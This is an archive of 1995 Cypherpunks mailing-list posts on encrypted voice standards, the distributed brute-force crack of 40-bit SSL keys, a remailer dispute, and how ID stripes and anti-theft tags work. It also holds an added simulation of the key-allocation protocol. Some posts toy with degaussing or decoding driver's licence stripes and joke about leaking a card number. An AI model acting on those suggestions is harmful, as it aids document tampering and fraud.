>   It's really great that there are all these voice transmission/encryption
> programs out there, the problem is, none of them will talk to each other.

Maybe someone could start writing an internet draft about "encrypted
voice transmission on the internet".  It should address several
issues:
  - compression methods, sampling rate differences, encoding methods
  - encryption methods used for bulk data: at least IDEA, 3DES, DES
    (3DES and DES required, IDEA optional but recommended (for patent reasons))
  - key exchange and authentication methods.  One good model could be
    that used in Photuris (see the internet draft
    draft-ietf-ipsec-photuris-02.txt at e.g. www.ietf.cnri.reston.va.us).
    Photuris is essentially Diffie-Hellman followed by authenticating
    the other party via signing the exchange.  (Authentication is
    important to avoid man-in-the-middle attacks).
  - specification of the protocol for modem-to-modem connections

Provided that the compression method is patent-free, all of the
related crypto patents expire within about two years (assuming
something other than RSA can be used for the signatures - see the
Photuris draft).  (IDEA should be optional because its patent will not
expire in near future).

I think it would be a good idea to set up a mailing list for this.

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 27 Aug 95 04:25:08 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: proliferation of voicesystems
In-Reply-To: <199508270121.EAA24196@shadows.cs.hut.fi>
Message-ID: <199508271034.GAA20541@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tatu Ylonen writes:
> >   It's really great that there are all these voice transmission/encryption
> > programs out there, the problem is, none of them will talk to each other.
> 
> Maybe someone could start writing an internet draft about "encrypted
> voice transmission on the internet".

Well, we already have standards for how to send audio in general over
the internet (the RTP standards that are used in the MBONE among other
places.) Presumably if you take IPSEC and cross it with RTP...

The real issue to me is setting such things up so that they work
nicely even on point to point modem connections without too much
protocol overhead.

> I think it would be a good idea to set up a mailing list for this.

Probably...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sun, 27 Aug 95 00:41:51 PDT
To: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Subject: Re: Greetings
In-Reply-To: <199508270626.CAA00589@kanga.INS.CWRU.Edu>
Message-ID: <"swan.cl.cam.:183500:950827074128"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> going on, I am led to believe that Cypherpunks is setting up
> a distributed system to break some cryptographic system or 
> factor a large number.

See http://www.brute.cl.cam.ac.uk/brute/

We are trying to show that the US Govt's crippling of exportable "secure"
protocols to 40 bits leaves them open to CRACKing by others than the NSA.

> I would expect that a constant net connection would be a requirement to
> participate in such an interesting event.

No -- that is the preferred way, but you can use a network connection
(WWW or direct socket) to get part of the address space to search,
process it offline, and then report back your findings later.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Sun, 27 Aug 95 01:39:50 PDT
To: wfrench@interport.net
Subject: SSL trouble
In-Reply-To: <199508262332.TAA26817@interport.net>
Message-ID: <9584.199508270839@olib>
MIME-Version: 1.0
Content-Type: text/plain



Will French <wfrench@interport.net> writes:
>   Well, if someone starts talking real money, I might change my
> tune.

We are talking real money, the guy who hit the key will shortly be
getting c$ 442.30 (DigiCash c$), the amount of c$ donated for the 2nd
challenge on this page:

	http://dcs.ex.ac.uk/~aba/sslprize.html

Now collecting donations for the 3rd challenge which I guess Piete
will be hoping to do in the next few weeks, after a few software
improvements have been made.

You can buy US$ with these on the unofficial digicash exchange:

	http://www.c2.org/~mark/ecash/ecash.html

The current exchange rate is around 100 c$ = 5 US$, so that's ~22 US$,
not a huge prize, but all it needs is more donors to get a bigger
prize fund, if you want to join in to make the prize fund bigger, sign
up for the digicash trial (you get 100 c$ free):

	http://www.digicash.com/ecash/

and buy some c$ on the unofficial exchange.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Sun, 27 Aug 95 11:48:30 PDT
To: Damien.Doligez@inria.fr (Damien Doligez)
Subject: Re: SSL trouble
In-Reply-To: <9508261034.AA15406@couchey.inria.fr>
Message-ID: <199508271848.LAA18104@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| Let us call "sequential search" an algorithm that remembers which keys were
| tried and avoids trying them again, and "random search" an algorithm that
| just tries keys at random without bothering to check.
|  
| The sequential search has the following problems:
|  
| 1. The server is badly overloaded.
| It is vulnerable to a variety of active attacks:
| 2. "result hoarding" attacks: finding the result and reporting it "not found".
| 3. "dilution" attack: allocating some search space and not sweeping it.
| 4. plain old "denial of service" attack: deliberately overloading the server
|    with bogus communications.
| 5. And of course all of the above in their "buggy software or hardware"
|    versions.

And there is the third alternative, hierarchical search, which
distributes the task of giving out keys. This is admittedly a
little bit more involved, of course. The SKSP had provisions for
doing it hierarchically, as far as I understood it, although
I might be wrong.

What I wonder is whether the server congestion really showed that
the protocol is flawed. Handing out bigger blocks relieved the 
situation. I think this can be further improved if you do a couple 
more things.

1. The server knows approximately how many requests per second it 
can take, and tells the clients this information.

2. The client initially does a testrun, and determines how fast it 
runs.

3. Each client is handed a block that, given the approximate number
of currently pending and active blocks out there, together with the
calculation time of the client, will give an acceptable number of 
requests/time unit to the server.

4. The server acks (S-ACK) the block-ack to the client. If the client 
doesn't get an ack (S-ACK) from the server for its ack (B-ACK), it 
keeps the ack around til the next block is calculated, and sends this 
ack together with the new acks.

5. The server can hand out allocated blocks to others, for those
blocks that have not been acked in three times the estimated
calculation time. 

6. If a client is unable to get a key allocation after a number of 
tries, it can choose a random block and search that. It can then be
acked to the server. This may result in overlapping blocks, but this
should not pose such a big problem, since most of the key space is
searched in an orderly manner anyway.

It would be very interesting if detailed statistics or the logfile
of the server could be published somewhere. How many machines were
involved? etc...

/Christian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 27 Aug 95 13:18:29 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits
Message-ID: <199508272017.NAA06661@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


White Adept wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> On Sat, 26 Aug 1995, Q Mixmaster Remailer wrote:


> > silly@whip.ugcs.caltech.edu ((me)) wrote:

> > > California has both the digitized picture and the mag stripe, and
> > > they even get a digital copy of your thumbprint.  Hello, Brave New

> > > World.
> > I wonder what, if anything, you could be charged with if that
> > magnetic strip "accidentally" came too close to a degausser?

> Why bother to degauss it--why not just let it "rest" too long on those 
> demagnetizing pads they use at department stores and libraries to 
> demagnetize the security strips?

Better would be to figure out the encoding scheme and post it here.
Anonymously to be sure







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 27 Aug 95 13:15:11 PDT
To: Thomas Grant Edwards <ylo@cs.hut.fi>
Subject: Re: proliferation of voicesystems
Message-ID: <v02120d05ac6690b0fb58@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:38 8/27/95, Thomas Grant Edwards wrote:
>On Sun, 27 Aug 1995, Tatu Ylonen wrote:
>
>> Maybe someone could start writing an internet draft about "encrypted
>> voice transmission on the internet".  It should address several
>> issues:
>>   - compression methods, sampling rate differences, encoding methods
>
>BTW - does anyone actually know what the voice compression is in
>PGPfone?

GSM lite and I think CELP. PGPFone has some serious problems with the
variable latencies of real life connections. These problems will not go
away until PGPFone makes the shift to APIs that are designed to deal with
such problems, such as QuickTime conferencing. I hope PRZ will realize
this.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: henri@netcom.com (henry)
Date: Sun, 27 Aug 95 06:34:38 PDT
Subject: this is getting silly (was Re: C2.ORG REMAILER)
In-Reply-To: <41gsan$elo@utopia.hacktic.nl>
Message-ID: <henriDDz17L.H37@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <vxFQws0p3fRe084yn@walli.uwasa.fi>,
Jukka Santala <jsantala@walli.uwasa.fi> wrote:
>In scroll <41jnqn$qgm@nntp.crl.com>, Nobody wrote:
>> sameer@soda.CSUA.Berkeley.EDU (Sameer Parekh) wrote:
>>> Community COnneXion will not reveal the identity of non-anonymous
>>> account holders without a court order or explicit permission from
>>> the account holder.
>> Sameer - You caved WAAAY too easily - I will suggest that we ban ALL
>> inclusion of your remailer in any chain, due to the fact that your
>> c2.org CAN NOT be trusted to resist pressure.  See ya on the c-punks
>> area.

this is bogus.  i'll explain why.

>Now, Nobody, that is chickenshit if anything, and I "suggest" you
>know it.  The actions taken by Community ConneXion in no way prove
>that it would be any less trustable in this matter than any other
>remailer in the world.  In fact, certain coolheadedness to all
>parties present is, in my opinion, one of the main requirements of
>respectable remailer.  In fact, had c2.org been pinned down for the
>copyright infringement with no ability to point the real infringer, CoS
>could well have stood a chance to get hold of any possible remailer
>logs.

i seriously doubt that sameer keeps logs, as i believe he runs
a cypherpunks remailer.  furthermore, regardless of how anyone
feels about the state of sameer's courage, attacking his integrity
is utterly ridiculous.  he hasn't given out anyone's userid, 
nobody's anonymity has been compromised, and to suggest that
because you don't like his decision in this matter that he's
going to go around coughing up userids and personal identities
is completely ridiculous.  ridiculous beyond belief.

i agree with jukka.  sameer's given us no reason not to trust
him, even if he's given us a bit of attitude.  i'd probably
have responded in about the same way if i were suddenly dragged
into what you have to admit is an extremely convoluted and 
bizarre netwar with an alarming tendency to get people's 
computers confiscated and homes attacked.

h
- --
              Xenu's Famous House o' Clams T-shirts!
 *All* profits go to MoFo to help with the Dennis Erlich Defense Fund.
            Email to:  ladyada@gnu.ai.mit.edu for details
            $15 per shirt, 3 colors.  Design available at 
        http://www.cybercom.net/~rnewman/scientology/home.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQBVAgUBMEBxw3Z/m2/Pgo35AQHpkwH8DO752jxoMFwG6fCLsI7vZGMV/hxX4H/U
K1PWw5XZQanIeSMytdML5lbok5iwWWoD2xMwnWBSjvgSRyxmuNkLyQ==
=tTgw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sun, 27 Aug 95 18:52:16 PDT
To: cypherpunks@toad.com
Subject: SSL ACKs vs. Anonymity (was Re: SSL trouble)
In-Reply-To: <199508271848.LAA18104@Csli.Stanford.EDU>
Message-ID: <199508271943.PAA16219@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Having ACKs from the people cracking your SSL exchange is fun; it
provides feedback on whether your code is working, allows the
volunteers to see their name in lights, and gives you this nice warm
feeling that progress is being made. In server-allocation schemes, it
also provides an optimization: no need to hand out chunks that have
been ACKed.

Not having ACKs provides anonymity to those who are performing the
crack. The only two agents who have issues of anonymity to consider
are: the one presenting the challenge (and its prize), and the one
that gets the solution (and its prize).

Perhaps anonymity is unimportant for toy problems: so far, Hal has not
complained that Agent 86's CCNs have been spread all over the Net. I
can imagine a "real" challenge being a much more serious affair. Do
you really want to be caught talking with www.brute.cam.cl.ac.uk for
two days straight just before someone posts Louis Freeh's American
Express number to alt.credit-cards.exploit?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsantala@walli.uwasa.fi (Jukka Santala)
Date: Sun, 27 Aug 95 04:44:33 PDT
Subject: Re: C2.ORG REMAILER
In-Reply-To: <41gsan$elo@utopia.hacktic.nl>
Message-ID: <vxFQws0p3fRe084yn@walli.uwasa.fi>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In scroll <41jnqn$qgm@nntp.crl.com>, Nobody wrote:
> sameer@soda.CSUA.Berkeley.EDU (Sameer Parekh) wrote:
>> Community COnneXion will not reveal the identity of non-anonymous
>> account holders without a court order or explicit permission from
>> the account holder.
> Sameer - You caved WAAAY too easily - I will suggest that we ban ALL
> inclusion of your remailer in any chain, due to the fact that your
> c2.org CAN NOT be trusted to resist pressure.  See ya on the c-punks
> area.

Now, Nobody, that is chickenshit if anything, and I "suggest" you
know it.  The actions taken by Community ConneXion in no way prove
that it would be any less trustable in this matter than any other
remailer in the world.  In fact, certain coolheadedness to all
parties present is, in my opinion, one of the main requirements of
respectable remailer.  In fact, had c2.org been pinned down for the
copyright infringement with no ability to point the real infringer, CoS
could well have stood a chance to get hold of any possible remailer
logs.

Just like in the anon.penet.fi case, where Helsingius gave out the
entries identifying the account in question instead of holding them
back at the risk of getting all the entries confiscated.  It's
called picking the lesser evil.  In fact, the only effect you stand
to gain from accusing people of such acts is perhaps making them
that much more inclined to really co-operate with your enemy next
time they ask for it.

Furthermore, although Sameer could've been pretty sure of even
monetary support from the 'net community in his battles against CoS,
I personally think such would only be waste of resources.  The
copyrights of OT materials will be found out in Erlich's case,
posting them publicly in Lerma's case and the common provider status
of ISP's will be tested in Netcom's case.  In my opinion, we stand
nothing to gain, only lose, from increasing the number of cases
further.  Not to even mention that the Fishman documents have now
been temporarily sealed, which further clouds the issue.

Finally, I hope you do know that the reason of actually using
remailer-chains is the admittance that some of them might be
compromised.  The idea behind remailer chains is that each and every
one of the mailers in the chain needs first to be identified and
then compromised to successfully find out the real poster.
"Banning" it out of the remailer chains, even if possible, would
serve no purpose.  Posting the facts and letting people make their
own decisions based on those could, perhaps, be warranted.

  Regards,
    Donwulff

Intergalactic terrorist and arms dealer, squire for Knights of Xenu.
Operation Entheta National Command, captain Donwulff of Discordia.
Tell your people.  alt.religion.scientology   Let The World Know!
           -><- Hail Eris! All hail Discordia! -><-

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMEBkayrmAC3+VL2ZAQEw3AQAvq5NKAExecLJ1/GKpSfO10w8Y/H/1cpi
AJAGc2JikWfPVvhxaw1b1Ib3TiX4IyvMHXu2YIldDUcWnCYq/Yx2iAnbeo08r7Uq
y7sgDjghyuMBX9EXtaVN4uiRSc+ESDM/oTQGc6atFbtqrSmoKlyO/jHWp/A76pL/
SIYVGLU+kV8=
=DQ3K
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Sun, 27 Aug 95 14:43:44 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: proliferation of voicesystems
In-Reply-To: <199508270121.EAA24196@shadows.cs.hut.fi>
Message-ID: <199508272143.OAA19782@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Note that most of the MBone tools already have encrypted sessions
built in them, and have had that for at least a year, and that the
MICE project in Europe has tried to put encryption into the last ones.

There is also a lot of standardization efforts going on within the
IETF community, for example within the MMUSIC group, chaired by
Mark Handley from UCL, London <M.Handley@cs.ucl.ac.uk>. They are
standardizing the session control protocol, for example, using one
called CCCP. They are also concerned about security, that's for sure.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Sun, 27 Aug 95 12:39:01 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: proliferation of voicesystems
In-Reply-To: <199508270121.EAA24196@shadows.cs.hut.fi>
Message-ID: <Pine.SUN.3.91.950827153801.29699A-100000@pipa.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 27 Aug 1995, Tatu Ylonen wrote:

> Maybe someone could start writing an internet draft about "encrypted
> voice transmission on the internet".  It should address several
> issues:
>   - compression methods, sampling rate differences, encoding methods

BTW - does anyone actually know what the voice compression is in 
PGPfone?

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Sun, 27 Aug 95 12:40:34 PDT
To: Tobin T Fricke <dr261@cleveland.Freenet.Edu>
Subject: Re: proliferations of voicesystems
In-Reply-To: <199508270234.WAA07065@kanga.INS.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.950827153918.29699B-100000@pipa.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 26 Aug 1995, Tobin T Fricke wrote:

> I'd have to agree with you (Ray) completely about the need for
> standards for the voice internet communications software. 

There is a standards track for real-time audio and video communications.  
Seems to me the hard part is defining codecs, the easy part is dropping 
in crypto.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Sun, 27 Aug 95 20:55:24 PDT
Subject: Re: Thanks for all your efforts ... you can stop now ...
In-Reply-To: <Pine.SUN.3.91.950826130755.29279A-100000@pipa.src.umd.edu>
Message-ID: <Pine.3.89.9508272250.A957-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 26 Aug 1995, Thomas Grant Edwards wrote:

> I hope this will not be the end of our distributed brute-forcing runs, 
> but only the beginning!  We should be able to take what we have learned 
> from this run and put together an even smoother run for the next challenge.
> 

Can someone please summarize the experience for those of us who were on 
vacation during the trial so we can learn in an abridged way?  What 
problems ensued (the bottlenecks, etc.) and what solutions were thought 
up?  Thanks.


> -Thomas
> 

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Sun, 27 Aug 95 13:44:56 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits
In-Reply-To: <199508272017.NAA06661@jobe.shell.portal.com>
Message-ID: <Pine.BSD.3.91.950827154138.22436A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 27 Aug 1995 anonymous-remailer@shell.portal.com wrote:
> 
> Better would be to figure out the encoding scheme and post it here.
> Anonymously to be sure

Thanks, I'll remember to do that to MN's license.
Anyone know of stripereaders in the state?

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Sun, 27 Aug 95 15:52:56 PDT
To: Will French <wfrench@interport.net>
Subject: Re: SSL trouble
In-Reply-To: <199508270432.AAA20728@interport.net>
Message-ID: <199508272252.PAA20854@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| >   One small point, cryptanalysis equipment is also covered by
| > ITAR restrictions.
| 
|   What is the significance of this rather ominous warning?

And I guess they would consider even brute-forcing code to be 
cryptoanalysis? But not the actual netscape binaries, since they
are for "proper" use. :-(

Sigh. I'm getting tired of all this.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Sun, 27 Aug 95 13:41:18 PDT
To: cypherpunks@toad.com
Subject: Re: Demagnetizing
Message-ID: <199508272050.PAA05379@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain



>Reply-To: dr261@cleveland.Freenet.Edu (Tobin T Fricke)

>
>Where exactly is the r/c circuit?  Is it very small and in
>a label?  Book publishers don't put them in, do they?  
>Also, if the thing gets "burned out" by the magnet in the
>pad, what do libraries and such do where materials are
>reused?  Just slap on another label thing?  
>
It's much more low-tech than that.  Libraries and book stores just
put a strip of magnetized material (it's much like audio tape,
about 1/8 inch wide and comes on rolls) inside the book and then
put detectors at the doorway.  If the detector feels a magnetic field,
it buzzes; if the tape has been degaussed, nothing happens.

For libraries, it's usually mounted on sticky tape and put down
inside the book spine.  Bookstores usually just snip off a 4 - 5"
segment and slip it inside the book.  Music stores frequently tape
a small section on the outside of CD jewel boxes.

Sorry, there's no real mystery or exciting tech here.

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Sun, 27 Aug 95 14:01:11 PDT
To: Tobin T Fricke <cypherpunks@toad.com
Subject: Re: proliferations of voicesystems
In-Reply-To: <Pine.SUN.3.91.950827153918.29699B-100000@pipa.src.umd.edu>
Message-ID: <Pine.SUN.3.91.950827163727.29741D-100000@pipa.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 27 Aug 1995, Thomas Grant Edwards wrote:

> There is a standards track for real-time audio and video communications.  
> Seems to me the hard part is defining codecs, the easy part is dropping 
> in crypto.

See ftp://gaia.cs.umass.edu/pub/hgschulz/rtp/draft-ietf-avt-rtp-06.txt
for more information on the RTP standard.

See ftp://gaia.cs.umass.edu/pub/hgschulz/rtp/draft-ietf-avt-profile-04.txt
for the use of RTP in video and audio conferencing.  This draft 
recommends the following audio encodings:

  name   nom. sampling    rate  type  frame   description
                    Hz    kb/s  S/F      ms
 _________________________________________________________________________
  L8             11025    88.2  S             8-bit linear, offset
  L16            48000     768  S             16-bit linear, 2's complement
  L16            44100   705.6  S
  L16            22050   352.8  S
  L16            11025   176.4  S
  G722           16000      64  S             CCITT/ITU-T subband ADPCM
  PCMU            8000      64  S             CCITT/ITU-T mu-law PCM
  PCMA            8000      64  S             CCITT/ITU-T A-law PCM
  G721            8000      32  S             CCITT/ITU-T ADPCM
  IDVI            8000      32  S             Intel/DVI ADPCM [IMA]
  IDVI           16000      64  S             Intel/DVI ADPCM [IMA]
  G723            8000      24  S             CCITT/ITU-T ADPCM
  GSM             8000      13  F        20   RTE/LTP GSM 06.10
  1016            8000     4.8  F        30   CELP
 _________________________________________________________________________

Some of these seem perfectly appropriate for 28.8 kbps transmission, even 
with the overhead of a PPP dialup connection.  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Sun, 27 Aug 95 17:42:04 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Server congestion
Message-ID: <199508280041.RAA22255@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



I talked about acks of acks in a previous message, and I guess it was
somewhat vague there.

What happened, according to my uninformed view, during the SSL2
challenge was that the server got congested, and had problems with
both answering to key allocation requests and ack replies. I guess 
that the load of the machine was so high that it lost packets in the
input queues.

Client -----> UDP/Key allocation req ----> 
Client -----> UDP/Key allocation req ----> 
Client -----> UDP/Key allocation req ----> Server ---+
                                                     | alloc
Client <------- UDP/allocation reply ----------------+
  |
  | working...
  | 
Client ------- UDP/ack ------------------> ??

One problem was that the client believed that the ACK had arrived
at the server if it had sent it off, not counting with the possibility
of the ACK being lost on the way.

I instead propose that the Server sends an acknowledgement
back to the client once it has received an ACK from a client.

  | working...
  | 
Client ------- UDP/ack ------------------> Server -+
                                                   |
Client <------ UDP/Server-ack ------------ Server -+

And then the client knows the server actually received the ACK
and has incorporated it into its table.

The client has to handle the case that either the Ack or the
Server-ack is lost. I propose it doesn't retransmit immediately,
but rather waits until next time it has to ack something, and 
piggybacks the old ack onto the new one.

Client -----> UDP/Key allocation req ----> 
Client -----> UDP/Key allocation req ----> 
Client -----> UDP/Key allocation req ----> Server ---+
                                                     | alloc
Client <------- UDP/allocation reply ----------------+
  |
  | working...
  | 
Client ------- UDP/ack1 ------------------> ??
  | 
"oops, oh well, lets try later."
  |
Client -----> UDP/Key allocation req ----> Server ---+
                                                     | alloc
Client <------- UDP/allocation reply ----------------+
  |
  | working...
  | 
Client ------- UDP/ack2/ack1 ------------> Server -+
                                                   |
Client <------ UDP/Server-ack {1,2} ------ Server -+
  | 

There are countermeasures if either part doesn't get messages for some
reason. 

If the server doesn't see the ACK for a block, it might give that
block out to someone else.

If the client is unable to retrieve a block from the server, I suggest
it just picks a random block and starts working on it. It may very
well not be allocated to someone else, and then the client was able
to do something good in the meantime even though it didn't get a
proper key alloc. 

/Christian
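
[Added example, not part of the original posts or of the brute/SKSP software: an in-memory simulation of the scheme in the two messages above (the numbered steps in "Re: SSL trouble" and the ack-of-ack diagrams in "Server congestion"). The names Server, Client, ScriptedChannel and block_size, the scripted loss pattern, and the two-datagrams-per-block cost used for sizing are assumptions made for illustration; no real UDP is used.]

```python
import math
import random


def block_size(keys_per_sec, active_clients, server_req_per_sec, req_per_block=2):
    """Steps 1-3: pick a block big enough that all clients together stay under
    the server's advertised request rate. Assumption: each block costs the
    server req_per_block datagrams (one allocation request, one B-ACK)."""
    min_seconds = req_per_block * active_clients / server_req_per_sec
    return math.ceil(keys_per_sec * min_seconds)


class ScriptedChannel:
    """Lossy datagram path; outcomes are scripted so every run is repeatable."""

    def __init__(self, outcomes):
        self.outcomes = list(outcomes)

    def delivered(self):
        return self.outcomes.pop(0) if self.outcomes else True


class Server:
    def __init__(self, n_blocks, est_time):
        self.n_blocks, self.est_time, self.now = n_blocks, est_time, 0
        self.state = {b: "free" for b in range(n_blocks)}  # free | out | done
        self.issued_at = {}

    def allocate(self):
        # Step 5: a block un-acked for 3x the estimated time is handed out again.
        for b in range(self.n_blocks):
            expired = (self.state[b] == "out"
                       and self.now - self.issued_at[b] > 3 * self.est_time)
            if self.state[b] == "free" or expired:
                self.state[b] = "out"
                self.issued_at[b] = self.now
                return b
        return None

    def receive_b_ack(self, blocks):
        # Idempotent, so duplicate acks and acks for random blocks are harmless.
        for b in blocks:
            self.state[b] = "done"
        return set(blocks)  # contents of the S-ACK


class Client:
    def __init__(self, server, channel, rng, max_tries=3):
        self.server, self.channel, self.rng = server, channel, rng
        self.max_tries = max_tries
        self.unconfirmed = []  # B-ACKs sent (or queued) but not yet S-ACKed

    def get_block(self):
        for _ in range(self.max_tries):
            if self.channel.delivered():  # request and reply both got through
                block = self.server.allocate()
                if block is not None:
                    return block
        # Step 6: no allocation after several tries, so search a random block.
        return self.rng.randrange(self.server.n_blocks)

    def report(self, block):
        # Step 4: no immediate retransmit; old acks ride along with the new one.
        self.unconfirmed.append(block)
        if not self.channel.delivered():      # B-ACK lost on the way
            return
        s_ack = self.server.receive_b_ack(self.unconfirmed)
        if self.channel.delivered():          # S-ACK made it back
            self.unconfirmed = [b for b in self.unconfirmed if b not in s_ack]


def lost_ack_scenario():
    """Constructed run: first B-ACK is lost, then piggybacked on the second."""
    server = Server(n_blocks=4, est_time=10)
    client = Client(server, ScriptedChannel([True, False]), random.Random(1))
    first = client.get_block()
    client.report(first)                      # ack1 is dropped
    after_loss = (list(client.unconfirmed), server.state[first])
    client.report(client.get_block())         # ack2/ack1 arrive together
    return after_loss, list(client.unconfirmed), dict(server.state)


def reclaim_scenario():
    """Constructed run: block 0 is never acked and is reissued after 3x est_time."""
    server = Server(n_blocks=2, est_time=10)
    a = server.allocate()
    server.now = 30                           # exactly 3x: not yet expired
    b = server.allocate()
    server.now = 31                           # past 3x: block 0 is reissued
    return a, b, server.allocate()


if __name__ == "__main__":
    print(block_size(50_000, 200, 10))
    print(lost_ack_scenario())
    print(reclaim_scenario())
```
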





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 27 Aug 95 15:00:34 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: proliferation of voicesystems
In-Reply-To: <v02120d05ac6690b0fb58@[192.0.2.1]>
Message-ID: <199508272159.RAA00299@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:
> >BTW - does anyone actually know what the voice compression is in
> >PGPfone?
> 
> GSM lite and I think CELP. PGPFone has some serious problems with the
> variable latencies of real life connections. These problems will not go
> away until PGPFone makes the shift to APIs that are designed to deal with
> such problems, such as QuickTime conferencing. I hope PRZ will realize
> this.

  And Windows95/NT has an Audio Compression Manager which comes with
GSM and TrueSpeech compression drivers. 

  The problem is, what will be done for the Unix users? A standard
audio API is sorely missing in the unix world (NetWork Audio 
System and AudioFile aren't solutions)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard <midnight@rio.atlantic.net>
Date: Sun, 27 Aug 95 15:30:01 PDT
To: Man In Black <mib@davinci.netaxis.com>
Subject: Re: Demagnetizing
In-Reply-To: <Pine.SOL.3.91.950827041448.24279A-100000@davinci.netaxis.com>
Message-ID: <Pine.LNX.3.91.950827182517.5467A-100000@rio.atlantic.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 27 Aug 1995, Man In Black wrote:

> On Sun, 27 Aug 1995, Tobin T Fricke wrote:
> 
> > How exactly does that system work?  They can't instantly 
> > demagnetize something with a quick tap on a pad, can they? Also,
> > what are they demagnetizing?  Is it a strip embedded in the spine
> > of the book, or is it just in a sticker on the outside? For
> > instance, how do they do it to magazines (or do they? they
> > go through the process with magazines, too, or is that just
> > because they don't know better?)?
> 
> The way the system works at my local library is that there _is_ a strip 
> embedded in the spine and it isn't demagnetized by a quick tap but by rubbing 
> it several times over a demagnetizer (there's a big sticker on the side 
> that says not to leave any magnetic storage media near it).   As far as 
> magazines go, my library simply doesn't let people borrow them (which 
> means if it ain't there, it's stolen).  Anyone know how they protect 
> against magazine theft (okay, no crypto relevance.  reply to me and not 
> the list, then).  Later.
> 

Okay.

The strips that you see in books and on those fake UPC stickers on 
merchandise are NOT magnetic.  They are simply antennas that are tuned
to a particular frequency.

What happens is that when you go near one of the readers/receivers, an 
electromagnetic (RF) wave is transmitted.  The antenna/sticker is tuned to
this particular frequency and resonates with it.  The result is that there
